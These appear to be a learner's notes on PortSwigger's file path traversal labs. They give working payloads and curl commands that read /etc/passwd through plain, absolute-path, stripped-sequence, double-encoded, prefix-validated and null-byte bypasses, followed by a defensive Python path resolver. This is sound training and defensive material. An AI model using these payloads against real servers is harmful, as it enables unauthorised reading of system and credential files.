Lab: File path traversal, simple case
- Use Burp Suite, because you need to interpret the request
- Intercept the request that loads the image OR open the image directly
- Replace the filename with
../../../etc/passwd
Using curl is also fine:
curl https://0a9b001f04ffae71821f01d800ff0017.web-security-academy.net/image?filename=../../../etc/passwd
Here is the response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
// Etc...
Obviously the response is fake, I mean, does it really have all these half-assed services?
Lab: File path traversal, traversal sequences blocked with absolute path bypass
In this case the application blocks the "traversal sequences" but treats the filename as if it were relative to a working directory, so an absolute path is accepted as-is:
curl path/to/the/lab/image?filename=/etc/passwd
Lab: File path traversal, traversal sequences stripped non-recursively
curl https://0a830097034b97fb8182c04c001e00ab.web-security-academy.net/image?filename=....//....//....//etc/passwd
Lab: LAB NAME
- 🔗 Link
- URL-encode the request twice in Burp Suite's Repeater and send it
This is the request:
GET /image?filename=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66etc/passwd HTTP/2
Host: 0a61005303a83b60803d9441004e00b7.web-security-academy.net
Cookie: session=36FEWpKcQ559kIKcMbY3d72PBuBy7gD7
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Sec-Ch-Ua-Platform: ""
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://0a61005303a83b60803d9441004e00b7.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
To do it from the command line:
curl --verbose --get --data-urlencode "filename=../../../etc/passwd" https://0a61005303a83b60803d9441004e00b7.web-security-academy.net/image
You should find
> GET /image?filename=..%2f..%2f..%2fetc%2fpasswd HTTP/2
Put the string "..%2f..%2f..%2fetc%2fpasswd" back into the request like this:
curl --verbose --get --data-urlencode "filename=..%2f..%2f..%2fetc%2fpasswd" https://0a61005303a83b60803d9441004e00b7.web-security-academy.net/image
Note: this second method might not work because the dots don't get encoded.
Lab: File path traversal, validation of start of path
If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences. For example:
The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder.
curl https://0a2000e804ff1a4a80ef5886005b00a4.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd
Lab: File path traversal, validation of file extension with null byte bypass
- In this case you need to use a "null byte", i.e. %00, because the path has to end with .jpg
curl https://0a17002103770425834bc5db006800e0.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg
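As an added example (not part of these notes nor of the labs' own code), here is how the file-serving side should resolve the filename so that every bypass above fails: collapse repeated percent-encoding, reject null bytes and absolute paths, canonicalise and then check containment with os.path.commonpath instead of a string prefix. BASE_DIR, the allowed extensions and the reason strings are assumptions of this example.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/images"          # assumed image directory (as in the prefix-validation lab)
ALLOWED_EXT = (".jpg", ".jpeg", ".png")  # assumed allow-list of extensions


def normalise_filename(raw, max_decodes=3):
    """Percent-decode until the value stops changing, so that
    %252e%252e%252f collapses to ../ before any check runs.
    Returns (decoded_value, number_of_decode_rounds_that_changed_it)."""
    value, rounds = raw, 0
    for _ in range(max_decodes):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def resolve_image(raw_filename, base_dir=BASE_DIR):
    """Return (absolute_path, None) for a safe request, or (None, reason)
    naming which traversal trick was attempted (useful for logging)."""
    name, rounds = normalise_filename(raw_filename)
    if "\x00" in name:                       # null-byte extension bypass
        return None, "null byte"
    if os.path.isabs(name) or name.startswith("\\"):
        return None, "absolute path"         # absolute-path / prefix-validation bypass
    base = os.path.realpath(base_dir)
    # No stripping of "../" here: "....//" is just an odd directory name,
    # and realpath resolves any remaining ".." segments for us.
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        reason = "escapes base dir"
        if rounds > 1:
            reason += " (double-encoded)"
        return None, reason
    if not candidate.lower().endswith(ALLOWED_EXT):
        return None, "bad extension"
    return candidate, None
```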